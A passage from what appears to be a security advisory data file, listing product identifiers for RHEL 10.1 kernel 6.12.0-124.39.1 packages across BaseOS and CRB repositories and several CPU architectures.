"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
